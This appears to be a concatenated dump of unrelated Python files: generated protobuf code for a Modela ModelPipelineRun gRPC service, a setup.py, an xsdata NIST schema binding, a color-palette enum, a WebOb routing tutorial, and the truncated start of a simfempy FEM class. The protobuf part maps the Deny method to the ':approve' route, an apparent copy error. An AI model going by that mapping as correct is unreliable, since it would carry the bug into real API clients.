serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1629,
serialized_end=1693,
)
_ABORTMODELPIPELINERUNRESPONSE = _descriptor.Descriptor(
name='AbortModelPipelineRunResponse',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1695,
serialized_end=1726,
)
_ABORTMODELPIPELINERUNREQUEST = _descriptor.Descriptor(
name='AbortModelPipelineRunRequest',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest.namespace', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1728,
serialized_end=1791,
)
# --- Cross-reference wiring (generated) ---
# Patch in the type links that cannot be expressed while the descriptors
# are being constructed: nested/containing types and message-typed fields
# that refer to types from the imported generated_pb2 module.
_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY.containing_type = _LISTMODELPIPELINERUNSREQUEST
_LISTMODELPIPELINERUNSREQUEST.fields_by_name['labels'].message_type = _LISTMODELPIPELINERUNSREQUEST_LABELSENTRY
_LISTMODELPIPELINERUNSRESPONSE.fields_by_name['items'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUNLIST
_CREATEMODELPIPELINERUNREQUEST.fields_by_name['item'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUN
_UPDATEMODELPIPELINERUNREQUEST.fields_by_name['item'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUN
_GETMODELPIPELINERUNRESPONSE.fields_by_name['item'].message_type = github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2._MODELPIPELINERUN
# Register every top-level message type on the file descriptor so it can be
# looked up by name, then register the file with the default symbol database.
DESCRIPTOR.message_types_by_name['ListModelPipelineRunsRequest'] = _LISTMODELPIPELINERUNSREQUEST
DESCRIPTOR.message_types_by_name['ListModelPipelineRunsResponse'] = _LISTMODELPIPELINERUNSRESPONSE
DESCRIPTOR.message_types_by_name['ModelPipelineRunResponse'] = _MODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['CreateModelPipelineRunRequest'] = _CREATEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['CreateModelPipelineRunResponse'] = _CREATEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['UpdateModelPipelineRunRequest'] = _UPDATEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['UpdateModelPipelineRunResponse'] = _UPDATEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['GetModelPipelineRunRequest'] = _GETMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['GetModelPipelineRunResponse'] = _GETMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['DeleteModelPipelineRunRequest'] = _DELETEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['DeleteModelPipelineRunResponse'] = _DELETEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['ApproveModelPipelineRunRequest'] = _APPROVEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['ApproveModelPipelineRunResponse'] = _APPROVEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['DenyModelPipelineRunRequest'] = _DENYMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['DenyModelPipelineRunResponse'] = _DENYMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['PauseModelPipelineRunResponse'] = _PAUSEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['PauseModelPipelineRunRequest'] = _PAUSEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['ResumeModelPipelineRunResponse'] = _RESUMEMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['ResumeModelPipelineRunRequest'] = _RESUMEMODELPIPELINERUNREQUEST
DESCRIPTOR.message_types_by_name['AbortModelPipelineRunResponse'] = _ABORTMODELPIPELINERUNRESPONSE
DESCRIPTOR.message_types_by_name['AbortModelPipelineRunRequest'] = _ABORTMODELPIPELINERUNREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ListModelPipelineRunsRequest = _reflection.GeneratedProtocolMessageType('ListModelPipelineRunsRequest', (_message.Message,), {
'LabelsEntry' : _reflection.GeneratedProtocolMessageType('LabelsEntry', (_message.Message,), {
'DESCRIPTOR' : _LISTMODELPIPELINERUNSREQUEST_LABELSENTRY,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest.LabelsEntry)
})
,
'DESCRIPTOR' : _LISTMODELPIPELINERUNSREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsRequest)
})
_sym_db.RegisterMessage(ListModelPipelineRunsRequest)
_sym_db.RegisterMessage(ListModelPipelineRunsRequest.LabelsEntry)
ListModelPipelineRunsResponse = _reflection.GeneratedProtocolMessageType('ListModelPipelineRunsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTMODELPIPELINERUNSRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ListModelPipelineRunsResponse)
})
_sym_db.RegisterMessage(ListModelPipelineRunsResponse)
ModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('ModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _MODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunResponse)
})
_sym_db.RegisterMessage(ModelPipelineRunResponse)
CreateModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('CreateModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunRequest)
})
_sym_db.RegisterMessage(CreateModelPipelineRunRequest)
CreateModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('CreateModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _CREATEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.CreateModelPipelineRunResponse)
})
_sym_db.RegisterMessage(CreateModelPipelineRunResponse)
UpdateModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('UpdateModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunRequest)
})
_sym_db.RegisterMessage(UpdateModelPipelineRunRequest)
UpdateModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('UpdateModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.UpdateModelPipelineRunResponse)
})
_sym_db.RegisterMessage(UpdateModelPipelineRunResponse)
GetModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('GetModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _GETMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunRequest)
})
_sym_db.RegisterMessage(GetModelPipelineRunRequest)
GetModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('GetModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _GETMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.GetModelPipelineRunResponse)
})
_sym_db.RegisterMessage(GetModelPipelineRunResponse)
DeleteModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('DeleteModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunRequest)
})
_sym_db.RegisterMessage(DeleteModelPipelineRunRequest)
DeleteModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('DeleteModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _DELETEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DeleteModelPipelineRunResponse)
})
_sym_db.RegisterMessage(DeleteModelPipelineRunResponse)
ApproveModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('ApproveModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _APPROVEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunRequest)
})
_sym_db.RegisterMessage(ApproveModelPipelineRunRequest)
ApproveModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('ApproveModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _APPROVEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ApproveModelPipelineRunResponse)
})
_sym_db.RegisterMessage(ApproveModelPipelineRunResponse)
DenyModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('DenyModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _DENYMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunRequest)
})
_sym_db.RegisterMessage(DenyModelPipelineRunRequest)
DenyModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('DenyModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _DENYMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.DenyModelPipelineRunResponse)
})
_sym_db.RegisterMessage(DenyModelPipelineRunResponse)
PauseModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('PauseModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _PAUSEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunResponse)
})
_sym_db.RegisterMessage(PauseModelPipelineRunResponse)
PauseModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('PauseModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _PAUSEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.PauseModelPipelineRunRequest)
})
_sym_db.RegisterMessage(PauseModelPipelineRunRequest)
ResumeModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('ResumeModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _RESUMEMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunResponse)
})
_sym_db.RegisterMessage(ResumeModelPipelineRunResponse)
ResumeModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('ResumeModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _RESUMEMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ResumeModelPipelineRunRequest)
})
_sym_db.RegisterMessage(ResumeModelPipelineRunRequest)
AbortModelPipelineRunResponse = _reflection.GeneratedProtocolMessageType('AbortModelPipelineRunResponse', (_message.Message,), {
'DESCRIPTOR' : _ABORTMODELPIPELINERUNRESPONSE,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunResponse)
})
_sym_db.RegisterMessage(AbortModelPipelineRunResponse)
AbortModelPipelineRunRequest = _reflection.GeneratedProtocolMessageType('AbortModelPipelineRunRequest', (_message.Message,), {
'DESCRIPTOR' : _ABORTMODELPIPELINERUNREQUEST,
'__module__' : 'github.com.metaprov.modelaapi.services.modelpipelinerun.v1.modelpipelinerun_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.services.modelpipelinerun.v1.AbortModelPipelineRunRequest)
})
_sym_db.RegisterMessage(AbortModelPipelineRunRequest)
DESCRIPTOR._options = None
_LISTMODELPIPELINERUNSREQUEST_LABELSENTRY._options = None
_MODELPIPELINERUNSERVICE = _descriptor.ServiceDescriptor(
name='ModelPipelineRunService',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1794,
serialized_end=4461,
methods=[
_descriptor.MethodDescriptor(
name='ListModelPipelineRuns',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.ListModelPipelineRuns',
index=0,
containing_service=None,
input_type=_LISTMODELPIPELINERUNSREQUEST,
output_type=_LISTMODELPIPELINERUNSRESPONSE,
serialized_options=b'\202\323\344\223\002!\022\037/api/v1alpha1/modelpipelineruns',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='CreateModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.CreateModelPipelineRun',
index=1,
containing_service=None,
input_type=_CREATEMODELPIPELINERUNREQUEST,
output_type=_CREATEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002$\"\037/api/v1alpha1/modelpipelineruns:\001*',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.GetModelPipelineRun',
index=2,
containing_service=None,
input_type=_GETMODELPIPELINERUNREQUEST,
output_type=_GETMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002(\022&/api/v1alpha1/modelpipelineruns/{name}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='UpdateModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.UpdateModelPipelineRun',
index=3,
containing_service=None,
input_type=_UPDATEMODELPIPELINERUNREQUEST,
output_type=_UPDATEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002E\032@/api/v1alpha1/modelpipelineruns/{modelpipelinerun.metadata.name}:\001*',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DeleteModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.DeleteModelPipelineRun',
index=4,
containing_service=None,
input_type=_DELETEMODELPIPELINERUNREQUEST,
output_type=_DELETEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002<*:/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ApproveModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.ApproveModelPipelineRun',
index=5,
containing_service=None,
input_type=_APPROVEMODELPIPELINERUNREQUEST,
output_type=_APPROVEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002D*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='DenyModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.DenyModelPipelineRun',
index=6,
containing_service=None,
input_type=_DENYMODELPIPELINERUNREQUEST,
output_type=_DENYMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002D*B/api/v1/modelpipelineruns/{modelpipelinerun.metadata.name}:approve',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='AbortModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.AbortModelPipelineRun',
index=7,
containing_service=None,
input_type=_ABORTMODELPIPELINERUNREQUEST,
output_type=_ABORTMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002$\"\"/v1/modelpipelineruns/{name}:abort',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='PauseModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.PauseModelPipelineRun',
index=8,
containing_service=None,
input_type=_PAUSEMODELPIPELINERUNREQUEST,
output_type=_PAUSEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002$\"\"/v1/modelpipelineruns/{name}:pause',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ResumeModelPipelineRun',
full_name='github.com.metaprov.modelaapi.services.modelpipelinerun.v1.ModelPipelineRunService.ResumeModelPipelineRun',
index=9,
containing_service=None,
input_type=_RESUMEMODELPIPELINERUNREQUEST,
output_type=_RESUMEMODELPIPELINERUNRESPONSE,
serialized_options=b'\202\323\344\223\002%\"#/v1/modelpipelineruns/{name}:resume',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_MODELPIPELINERUNSERVICE)
DESCRIPTOR.services_by_name['ModelPipelineRunService'] = _MODELPIPELINERUNSERVICE
# @@protoc_insertion_point(module_scope)
| nilq/baby-python | python |
"""Packaging script for the ``toms`` command-line utility."""
import os.path
import re

from setuptools import setup

# Read the version straight from the package so it lives in exactly one place.
# Raw string: ``\s`` in a plain literal is an invalid escape on modern Python.
with open("toms/__init__.py", encoding="utf-8") as fid:
    (__version__,) = re.findall(r"__version__.*\s*=\s*[']([^']+)[']", fid.read())

HERE = os.path.abspath(os.path.dirname(__file__))

# The long description rendered on PyPI is the project README (markdown).
with open(os.path.join(HERE, "README.md"), encoding="utf-8") as fid:
    README = fid.read()

setup(
    name="toms",
    version=__version__,
    description="Convert date to milliseconds and back",
    long_description=README,
    long_description_content_type="text/markdown",
    url="https://github.com/d10xa/toms",
    author="d10xa",
    author_email="d10xa@mail.ru",
    license="MIT",
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
    ],
    packages=["toms"],
    include_package_data=True,
    install_requires=[
        "python-dateutil>=2.7.1"
    ],
    entry_points={"console_scripts": ["toms=toms.__main__:main"]},
)
| nilq/baby-python | python |
from dataclasses import dataclass, field
from typing import List
__NAMESPACE__ = "NISTSchema-SV-IV-list-time-pattern-3-NS"
@dataclass
class NistschemaSvIvListTimePattern3:
    """xsdata-generated binding for the NISTSchema-SV-IV-list-time-pattern-3
    root element: an xs:list whose whitespace-separated tokens must each
    match the pattern in ``value``'s metadata.
    """

    class Meta:
        # XML element name and namespace used by the xsdata (de)serializer.
        name = "NISTSchema-SV-IV-list-time-pattern-3"
        namespace = "NISTSchema-SV-IV-list-time-pattern-3-NS"

    value: List[str] = field(
        default_factory=list,
        metadata={
            # Per-token regex. NOTE(review): "\d4" matches a digit followed by
            # a literal "4" (not four digits) -- presumably mirrors the source
            # schema; confirm before "fixing".
            "pattern": r"\d4:4\d:\d8 \d4:2\d:2\d 0\d:4\d:3\d \d3:\d4:1\d 1\d:\d8:5\d \d2:\d3:4\d \d3:0\d:\d6 \d6:4\d:\d6 \d8:\d2:2\d",
            # tokens=True: the value is an xs:list, serialized space-separated.
            "tokens": True,
        }
    )
| nilq/baby-python | python |
from enum import Enum
class Colors(Enum):
    """Base brand colors as hex RGB strings."""
    GREEN = "#00C2A4"
    PINK = "#FD5383"
    PURPLE = "#8784FF"
    # Three blues, darkest (BLUE_1) to lightest (BLUE_3).
    BLUE_1 = "#1B2A4D"
    BLUE_2 = "#384B74"
    BLUE_3 = "#8699B7"
class ColorPalettes(Enum):
    """Ready-made palettes built from :class:`Colors` plus interpolated shades."""

    # Qualitative palette for distinct, unordered categories.
    CATEGORY = [
        Colors.BLUE_1.value,
        Colors.GREEN.value,
        Colors.PURPLE.value,
        Colors.PINK.value,
        Colors.BLUE_3.value,
    ]
    # Diverging scale: green through a neutral midpoint to pink.
    DIVERGING = [
        Colors.GREEN.value,
        "#7AD3BD",
        "#B8E2D6",
        "#F1F1F1",
        "#FCC1CB",
        "#FF8FA6",
        Colors.PINK.value,
    ]
    # Sequential blues (dark to light) for heatmap intensity.
    HEATMAP = [
        Colors.BLUE_2.value,
        "#56678E",
        "#7584A9",
        "#94A2C5",
        "#B5C2E2",
        "#D6E2FF",
    ]
    # Ordered scale stepping from BLUE_1 toward PURPLE.
    ORDINAL = [
        Colors.BLUE_1.value,
        "#273969",
        "#354886",
        "#4657A3",
        "#5966C2",
        "#6f75E0",
        Colors.PURPLE.value,
    ]
| nilq/baby-python | python |
from .test_controller import JsonController, JsonArrayController, TemplateController
| nilq/baby-python | python |
"""
This file is a meant to make custom frame work like set up.
It will enable us to have a enpoints/routes for our API without
using a framework like flask or Django.
We will use WebOb to create a request and response object which
is centered around the WSGI model.
For more info https://docs.pylonsproject.org/projects/webob/en/stable/do-it-yourself.html
"""
import importlib
import inspect
import os
import re
import sys

import tempita
from webob import Request, Response, exc
"""
Here we create the regular expression(var_regex).
The re.VERBOSE flag makes the regular expression
parser ignore whitespace and allow comments.
"""
var_regex = re.compile(r'''
\{ # The exact character "{"
(\w+) # The variable name (restricted to a-z, 0-9, _)
(?::([^}]+))? # The optional :regex part
\} # The exact character "}"
''', re.VERBOSE)
def template_to_regex(template):
""" Function to compile templates to regular expressions."""
# This variable will hold the regular expression that we are creating.
regex = ''
# This contains the position of the end of the last match.
last_pos = 0
for match in var_regex.finditer(template): # The finditer method yields all the matches.
# On the next line, We're getting all the non-{} text from after the last match,
# up to the beginning of this match.
# We call re.escape on that text, which escapes any characters that have special meaning.
# So .html will be escaped as \.html.
regex += re.escape(template[last_pos:match.start()])
var_name = match.group(1) # The first match is the variable name.
# expr is the regular expression we'll match against, the optional second match.
# The default is [^/]+, which matches any non-empty, non-/ string.
expr = match.group(2) or '[^/]+'
expr = '(?P<%s>%s)' % (var_name, expr)
regex += expr
last_pos = match.end()
regex += re.escape(template[last_pos:])
regex = '^%s$' % regex
return regex
def load_controller(string):
    """Resolve a ``"module:attribute"`` spec to the object it names.

    E.g. ``load_controller("myapp.views:index")`` imports ``myapp.views``
    and returns its ``index`` attribute.

    Raises ImportError if the module cannot be imported and AttributeError
    if the attribute does not exist.
    """
    module_name, func_name = string.split(':', 1)
    # importlib.import_module replaces the old __import__ + sys.modules
    # workaround and returns the leaf submodule directly.
    module = importlib.import_module(module_name)
    return getattr(module, func_name)
class Router:
    """Tiny WSGI router mapping URL templates to controller applications."""

    def __init__(self):
        # List of (compiled_regex, controller, extra_vars) triples,
        # tried in registration order.
        self.routes = []

    def add_route(self, template, controller, **vars):
        # ``controller`` may be a WSGI app or a "module:function" string,
        # which is resolved immediately via load_controller. Extra keyword
        # arguments are merged into req.urlvars on a match.
        if isinstance(controller, str):
            controller = load_controller(controller)
        self.routes.append((re.compile(template_to_regex(template)),controller,vars))

    def __call__(self, environ, start_response):
        """
        This method makes the Router object itself a WSGI application:
        it dispatches to the first route whose regex matches PATH_INFO,
        exposing the captured groups as ``req.urlvars``.
        """
        req = Request(environ)
        for regex, controller, vars in self.routes:
            match = regex.match(req.path_info)
            if match:
                req.urlvars = match.groupdict()
                req.urlvars.update(vars)
                return controller(environ, start_response)
        # No template matched: answer 404 (HTTPNotFound is itself a WSGI app).
        return exc.HTTPNotFound('No route matched')(environ, start_response)
def rest_controller(cls):
    """Wrap a controller class as a WSGI app with REST-style dispatch.

    Per request, instantiate ``cls(req, **req.urlvars)`` and call the method
    named ``<action>_<httpmethod>`` (when ``req.urlvars['action']`` is set)
    or just ``<httpmethod>`` (e.g. ``get``, ``post``). A str return value is
    wrapped in a webob Response; webob HTTPExceptions become the response.
    """
    def replacement(environ, start_response):
        req = Request(environ)
        try:
            instance = cls(req, **req.urlvars)
            action = req.urlvars.get('action')
            if action:
                # e.g. action "edit" + GET -> method name "edit_get"
                action += '_' + req.method.lower()
            else:
                action = req.method.lower()
            try:
                method = getattr(instance, action)
            except AttributeError:
                raise exc.HTTPNotFound("No action %s" % action)
            resp = method()
            if isinstance(resp, str):
                resp = Response(body=resp)
        except exc.HTTPException as e:
            # HTTP errors raised anywhere above are themselves WSGI apps.
            resp = e
        return resp(environ, start_response)
    return replacement
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 4 18:14:29 2016
@author: becker
"""
import numpy as np
import numpy.linalg as linalg
from simfempy import fems
from simfempy.meshes.simplexmesh import SimplexMesh
import scipy.sparse as sparse
#=================================================================#
class Fem(object):
    """Base class for finite element spaces on a SimplexMesh.

    Holds the mesh and the cell-local dof stencils, and provides generic
    assembly routines (diffusion, convection, LPS stabilization) shared by
    the concrete FEM spaces in simfempy.fems. Subclasses are expected to
    provide nlocal(), nunknowns(), dofspercell() and self.cellgrads
    (per-cell basis-function gradients; last axis is sliced to the mesh
    dimension below).
    """
    def __repr__(self):
        repr = f"{self.__class__.__name__}"
        return repr
    def __init__(self, **kwargs):
        # Mesh may be supplied at construction time or later via setMesh().
        mesh = kwargs.get('mesh', None)
        if mesh is not None: self.setMesh(mesh)
    def setMesh(self, mesh, innersides=False):
        """Attach a mesh; optionally build the interior-face data needed by LPS."""
        self.mesh = mesh
        self.nloc = self.nlocal()
        if innersides: self.mesh.constructInnerFaces()
    def computeStencilCell(self, dofspercell):
